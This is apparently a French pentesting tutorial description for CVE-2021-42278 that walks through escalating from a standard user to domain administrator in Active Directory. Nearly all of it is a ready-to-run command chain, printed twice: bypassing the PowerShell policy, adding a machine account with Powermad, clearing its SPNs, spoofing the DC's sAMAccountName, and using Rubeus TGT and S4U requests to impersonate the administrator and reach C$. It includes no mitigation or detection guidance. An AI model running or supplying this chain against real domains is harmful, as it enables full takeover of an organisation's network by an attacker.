#pentesting #cybersecurity #hacking
Tutoriel en français détaillant le fonctionnement de la vulnérabilité CVE-2021-42278 permettant une élévation de privilèges sur un domaine active directory pour devenir administrateur du domaine à partir d'un compte utilisateur standard.
Le lien du mitre sur la vulnérabilité :
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42278
------------------------------------
Les commandes a exécuter :
# Lancer un powershell sans restriction
powershell -ep bypass
# Vider les tickets présents en mémoire
klist purge
# Charger le module Powermad et ajouter une machine au domaine avec un mot de passe de compte machine défini
Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount test23 -Domain pwndeleg.local -DomainController DC01.pwndeleg.local -Verbose
# Charger le module PowerView et supprimer les SPN de la machine
Import-Module .\PowerView.ps1
Set-DomainObject "CN=test23,CN=Computers,DC=pwndeleg,DC=local" -Clear 'serviceprincipalname' -Verbose
# Modifier le SamAccountName de la machine
Set-MachineAccountAttribute -MachineAccount test23 -Value "DC01" -Attribute sAMAccountName -Verbose
# Demander un ticket TGT en tant que compte machine DC01
.\Rubeus.exe asktgt /user:DC01 /password:12345 /domain:pwndeleg.local /dc:DC01.pwndeleg.local /nowrap
# Remettre le SamAccountName de notre machine par défaut
Set-MachineAccountAttribute -MachineAccount test23 -Value "test23" -Attribute sAMAccountName -Verbose
# Demander un ticket TGS avec notre ticket TGT en tant que Administrateur sur DC01
.\Rubeus.exe s4u /impersonateuser:Administrateur /nowrap /dc:DC01.pwndeleg.local /self /altservice:CIFS/DC01.pwndeleg.local /ptt /ticket:
# Lister les tickets présents en mémoire
klist
#Accéder au partage administratif c$ sur DC01 en tant qu'administrateur
dir \\DC01.pwndeleg.local\c$
------------------------------------
Mon blog :
https://lestutosdeprocessus.fr
Le lien de mon serveur Discord :
https://discord.gg/JJNxV2h
Tutoriel en français détaillant le fonctionnement de la vulnérabilité CVE-2021-42278 permettant une élévation de privilèges sur un domaine active directory pour devenir administrateur du domaine à partir d'un compte utilisateur standard.
Le lien du mitre sur la vulnérabilité :
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42278
------------------------------------
Les commandes a exécuter :
# Lancer un powershell sans restriction
powershell -ep bypass
# Vider les tickets présents en mémoire
klist purge
# Charger le module Powermad et ajouter une machine au domaine avec un mot de passe de compte machine défini
Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount test23 -Domain pwndeleg.local -DomainController DC01.pwndeleg.local -Verbose
# Charger le module PowerView et supprimer les SPN de la machine
Import-Module .\PowerView.ps1
Set-DomainObject "CN=test23,CN=Computers,DC=pwndeleg,DC=local" -Clear 'serviceprincipalname' -Verbose
# Modifier le SamAccountName de la machine
Set-MachineAccountAttribute -MachineAccount test23 -Value "DC01" -Attribute sAMAccountName -Verbose
# Demander un ticket TGT en tant que compte machine DC01
.\Rubeus.exe asktgt /user:DC01 /password:12345 /domain:pwndeleg.local /dc:DC01.pwndeleg.local /nowrap
# Remettre le SamAccountName de notre machine par défaut
Set-MachineAccountAttribute -MachineAccount test23 -Value "test23" -Attribute sAMAccountName -Verbose
# Demander un ticket TGS avec notre ticket TGT en tant que Administrateur sur DC01
.\Rubeus.exe s4u /impersonateuser:Administrateur /nowrap /dc:DC01.pwndeleg.local /self /altservice:CIFS/DC01.pwndeleg.local /ptt /ticket:
# Lister les tickets présents en mémoire
klist
#Accéder au partage administratif c$ sur DC01 en tant qu'administrateur
dir \\DC01.pwndeleg.local\c$
------------------------------------
Mon blog :
https://lestutosdeprocessus.fr
Le lien de mon serveur Discord :
https://discord.gg/JJNxV2h
- Catégories
- E commerce Divers
Commentaires